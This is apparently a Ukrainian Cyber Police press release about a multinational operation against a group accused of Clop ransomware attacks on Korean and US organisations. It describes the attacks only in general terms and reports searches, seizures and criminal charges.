Cyberpolice exposed hacker group in spreading encryption virus and causing foreign companies half a billion dollars in damage
With the help of the malicious ransomware “Clop”, the defendants encrypted the data that was on the information media of companies in the Republic of Korea and the United States. In the future, money was demanded for the restoration of access.
The hacker group was exposed by employees of the Cyber Police Department together with the Main Investigation Department of the National Police. The detection of the attackers took place as part of an international operation jointly with law enforcement officers of the Republic of Korea and the United States of America.
It was found that the six defendants carried out malware attacks such as “Ransomware” on the servers of US and Korean companies. For decrypting the data, they demanded a “ransom”, and in case of non-payment, they threatened to disclose the confidential data of the victims.
Thus, in 2019, four Korean companies were attacked by the Clop encryption virus, as a result of which 810 internal servers and personal computers of employees were blocked. Hackers sent emails with a malicious file to the inboxes of company employees. After opening the infected file, the program successively downloaded additional programs from the distribution server and carried out a complete infection of the victims' computers with the remote controlled program “Flawed Ammyy RAT”.
Using remote access, the defendants activated the “Cobalt Strike” malware, which provided information about the vulnerabilities of the infected servers for their subsequent capture. For decrypting the information, the attackers received a “ransom” in cryptocurrency.
In 2021, defendants carried out an attack and encrypted employee personal data and financial reports of Stanford University School of Medicine, the University of Maryland, and the University of California.
Unlike common ransomware attacks that encrypt large numbers of unidentified personal computers and servers, this is an APT (Advanced Persistent Threat) attack, which targets a specific victim's computer network and infects the entire system with ransomware.
The total amount of damage reaches 500 million dollars.
The joint efforts of law enforcement officers managed to stop the operation of the infrastructure from which the spread of the virus is carried out and block the channels of legalization of the criminally obtained cryptocurrency.
Law enforcement officers conducted 21 searches in the capital and Kyiv region, in the homes of the defendants and in their cars. The unit of Tactical and Operational Response of Patrol Police was involved in the searches. Computer equipment, cars and about 5 million hryvnias in cash were seized. The property of intruders was arrested.
Criminal proceedings under Part 2 of Art. 361 (Unauthorized interference in the operation of computers, automated systems, computer networks or telecommunication networks) and part 2 of Art. 209 (Legalization (laundering) of property obtained by criminal means) of the Criminal Code of Ukraine. The defendants face up to eight years in prison. Investigative actions continue.
Procedural guidance is carried out by the Office of the Prosecutor General of Ukraine.
Cyber Police Department of the National Police of Ukraine
